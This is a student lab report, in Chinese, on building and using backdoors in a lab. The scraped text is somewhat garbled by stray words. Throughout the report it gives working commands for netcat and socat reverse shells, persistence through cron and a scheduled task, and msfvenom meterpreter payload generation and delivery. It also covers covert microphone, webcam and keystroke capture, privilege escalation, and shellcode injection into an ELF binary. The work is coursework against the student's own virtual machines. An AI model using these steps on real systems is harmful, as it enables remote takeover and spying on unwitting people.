1.使用netcat獲取主機操做Shell,cron啓動 (0.5分)html
2.使用socat獲取主機操做Shell, 任務計劃啓動 (0.5分)linux
3.使用MSF meterpreter(或其餘軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell(0.5分)git
4.使用MSF meterpreter(或其餘軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權 (2分)web
5.可選加份內容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈鏈接Shell(1分)加份內容一併寫入本實驗報告shell
問題1:例舉你能想到的一個後門進入到你係統中的可能方式?windows
問題2:例舉你知道的後門如何啓動起來(win及linux)的方式?網絡
問題3:Meterpreter有哪些給你映像深入的功能?tcp
哇,既然提到這個問題,Meterpreter真的是細思極恐工具
問題4:如何發現本身有系統有沒有被安裝後門?學習
老實說,我作本次實驗的殺毒軟件都是關閉狀態,由於在作第一遍實驗時,注入到win10的socat.exe
和backdoor
程序很快就被發現了,因此,平時仍是打開殺毒軟件比較好。
後門
的一個程序;壞人能夠鏈接這個程序;經過該程序能夠遠程執行各類指令;概念上和木馬
上有重疊那麼,壞人一般如何經過後門進入系統呢?
說了這麼多,咱們經常使用的後門程序有哪些呢,也就是咱們實驗所使用的後門程序又有那些呢?
netcat
,一般用做nc
,可經過man netcat
或man nc
可查看說明。netcat.rar
,解壓後就可使用了。下面咱們就來嘗試一下如何使用netcat
和nc
吧。
在這裏Windows系統我選擇win7,Linux系統我選擇win10。
首先,利用ipconfig
查看windows的主機IP,如圖所示,個人主機IP爲192.168.154.139
。
下載好ncat
,進入目錄,按windows + R
組合鍵打開cmd.exe,輸入ncat.exe -l -p 5203
來監聽5203端口,如圖所示。
此時,在Linux中,讓Linux反彈鏈接win7,輸入命令nc 192.168.154.139 -e /bin/sh
,如圖所示。(該IP爲win的IP)
接下來,咱們能夠發現,咱們在windows端成功得到了Linux端的shell終端。
首先,咱們用ipconfig
得到Linux的ip地址,ip爲192.168.154.143
。如圖所示。
隨後,Linux經過輸入命令ns -l -p 5203
Windows反彈鏈接Linux,在Windows終端下的ncat目錄,輸入ncat.exe -e cmd.exe 192.168.154.143
,如圖所示。
這時,咱們就會看到Linux終端下出現了Windows的終端。嘗試一下,能夠查看windows下的文件了。
首先,咱們先來了解一下nc傳輸數據的格式
:
nc -l 監聽端口 > 要接收的文件名
nc 目的主機ip 目的端口
在Windows下發起監聽,一樣用ncat.exe -l -p 5203
,如圖所示。
Kali Linux下鏈接經過命令nc 192.168.154.139 5203
鏈接到Window7。
創建鏈接後,就能夠傳輸信息了,如圖所示。
Windows和Linux下傳輸文件。
ncat
的加強版,使用格式是socat <option> <adress> <adress>
, 其中兩個
socat
的windows下載路徑爲https://gitee.com/wildlinux/NetSec/attach_files。後門是一個程序,原本是有人編寫一個程序,你們拿來用,可是有一些厲害的人,想編寫一個平臺能生成後門程序。這個平臺,把後門的
等所有作成零件或可調整的參數。用的時候按須要的組合,就能夠生成一個可執行文件。
常見的平臺:
瞭解更多關於Meterpreter平臺的內容,能夠參考https://www.freebuf.com/articles/system/53818.html。
根據使用MSF生成的shellcode打造免殺playload,能夠了解到,咱們能夠用msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.154.139 lport=5203 -f c
(IP爲windows7的IP)生成shellcode, 注入到可執行文件裏,執行時能夠攻擊主機。
咱們本次實踐就是利用Meterpreter平臺
生成一個後門程序,而後攻擊靶機。
在windows系統下,輸入命令ncat.exe -l -p 5203
監聽5203端口。
用crontab -e
完成一條定時任務。
打開文檔後,在最後一行添加36 * * * * /bin/netcat 192.168.154.139 5203 -e /bin/sh
(windows的IP),意思是Kali Linux系統在每一個小時的第36分鐘反向鏈接windows的5203端口:
當時間爲21:36分時,監聽成功,windows處出現了Kali Linux終端,如圖所示(當我在終端輸出命令的時候,時間已通過了1分鐘,因此,截圖上顯示的時間是21:36分)。
本次實驗我選的windows系統是win10系統。我查了一下個人win10主機的ip爲 192.168.1.110
,如圖所示。
在win10系統下,右擊左下角windows的圖標,選擇計算機管理。
在任務計劃程序
處建立任務,填寫任務名稱(這個名稱是本身取的,個人是xyx)。
而後點擊觸發器
來新建一個觸發器。開始任務
選擇工做站鎖定時
, 設置範圍爲全部用戶
,而後點擊肯定
,觸發器就建立完了。
而後,在操做
->程序或腳本
中輸入咱們以前下載的socat.exe
的路徑,我直接把它放在了C盤----C:\用戶\xiao\socat\socat.exe
,在添加參數一欄中添加tcp-listen:5203 exec:cmd.exe,pty,stderr
,這個命令的做用是將cmd.exe綁定到端口5203上,同時把cmd.exe的stderr重定向到stdout上
。
任務建立完畢後,迅速按Windows+L
鎖定計算機,再次打開時,咱們能夠查看到本身的任務,按右鍵,使其啓動,狀態變爲正在運行
狀態。
在Kali Linux環境下輸入命令socat - tcp:192.168.1.110:5203
,這裏的第一個參數表明-
表明標準的輸入輸出,第二個流鏈接到了windows10主機上的5203端口,此時,能夠發現一個Kali Linux成功得到了一個cmd.exe,這個cmd.exe正是咱們windows10的終端。
在Kali Linux端,咱們輸入msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.154.139 lport=5203 -f exe > 20165203.exe
(windows7的IP地址),將生成的shellcode注入到後門程序20165203_backdoor.exe
中。
在Windows中使用ncat.exe -lv 5203 > 20165203_backdoor.exe
查看其鏈接狀態,如圖所示狀態爲鏈接正常。
在Kali Linux中輸入nc 192.168.154.143 < 20165203_backdoor.exe
(順序變,箭頭也要變),將20165203_backdoor.exe的後門程序注入到Windows7中。如圖所示,收到Connection的鏈接,說明傳輸成功。
並查看了本身在ncat文件夾中注入的20165203_backdoor.exe
程序,保證大小爲73K,若是爲0K,說明傳輸未成功。
咱們在Kali Linux的終端上新打開一個終端,輸入msfconsole
進入msf控制檯。
而後,咱們輸入use exploit/multi/handler
使用監聽模塊,設置payload
。
使用和生成後門程序相同的payload
(在第一步那裏),輸入命令set payload windows/meterpreter/reverse_tcp
。
使用set LHOST 192.168.154.139
(ip爲Kali的IP)來設置payload的IP。
使用set LPORT 5203
來設置payload的端口號。
payload設置完成後,咱們來使用exploit
開始監聽。
10.Kali Linux已經開始監聽,此時,咱們回到Windows7終端,退出上一次的命令,執行20165203_back_door.exe
,再看Kali Linux的終端,咱們發現Linux得到了遠程控制的Windows的shell。
接着上個內容,咱們可使用record_mic
截獲一段音頻,如圖所示。
使用webcam_snap
可使用攝像頭進行拍照。(由於在晚上作的實驗,穿着睡衣,就不拍本人了,嘻嘻)
使用screenshot
能夠截屏。
使用keyscan_start
指令能夠記錄下鼠標擊鍵的過程,使用keyscan_dump
能夠讀取擊鍵的記錄
使用getuid
查看當前用戶,使用getsystem
進行提權。
同窗們都推薦江智宇學姐的博客,經過學習學姐總結的博客,我瞭解到
在關於msfconcole的參數中:
-p 是指定用於特定的payload
然而,咱們須要的payload的功能是獲取反鏈接靶機的shell,學姐的博客中給出了咱們須要的payload是linux/x64/shell_reverse_tcp
,
後面,咱們須要的是LHOST
和LPORT
,而後,咱們還須要-x
來指定咱們須要注入的文件,爲/home/20165203/exp2/pwn2
.
-f
指定咱們文件的輸出的格式,注入到pwn2中,pwn2是一個可執行文件,因此選elf格式。
因此,咱們的命令格式爲
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.154.147 LPORT=5203 -x /home/20165203/exp2/pwn2 -f elf > pwn2_2
輸入上述命令後,生成被注入shellcode的可執行文件pwn2_2,如圖所示。
以後,咱們能夠將pwn2_2注入到windows7中,調用msfconcole來監聽,步驟與任務三相同了,作好了,就是如圖所示格式啦。
我遇到的問題零零散散,多數都是由於本身的智障犯下的錯誤,不過,我感受有的問題仍是很值得供你們參考借鑑的。
Q1:使用webcam_snap
使用win7攝像頭時,沒法使用,提示141錯誤,如圖所示。
A1:由於win7是在虛擬機中的,因此,咱們要從問題的根本下手。
首先,咱們想到多是win7虛擬機裏壓根兒就沒有攝像頭,由於想攝像頭這樣的USB設備原本就不可能同虛擬機和本機一塊兒使用的,咱們能夠嘗試查看一下win7的設備管理器,如圖進入win7裏面的控制面板
,查看設備管理器
。咱們能夠看到,裏面根本就沒有
圖像設備
,天然就沒有攝像頭
了。
接下來,咱們在虛擬機中設置,把USB端口鏈接到虛擬機上來,如圖所示,要選擇鏈接主機
哦。
接下來,咱們在win7中剛纔的設備管理器
中查看,就能發現有圖像設備
了, 就能夠「偷窺」了,哈哈哈哈。
Q2:昨晚剛作完本次實驗,結果今天打開Kali虛擬機時出現瞭如圖所示問題,媽呀,不會是搞實驗搞出問題了吧。
A2:結果,我發現我昨晚電腦裏的socat.exe
還在運行着,佔用着虛擬機,因而,我索性打開電腦裏的任務管理器
,將裏面帶有.vm
的進程所有關掉,而後再開啓個人電腦管家
,殺了一遍毒,Kali得以打開,看來平時仍是要常打開殺毒軟件。
此次實驗真的頗有激情,彷彿本身是個黑客,一步一步,固然是本身攻擊本身,哈哈,當達到攝像頭拍攝的效果時,本身彷彿開啓了新時代的大門,成就感頗升。
感謝這次咱們班課題負責人,也就是咱們寢室長本次實驗的幫助了,咱們能夠搞一個黑客組合了,哈哈。
不過,我以爲能夠在從此的實驗中,嘗試用其餘常見的後門程序來練習,更加熟悉後門原理。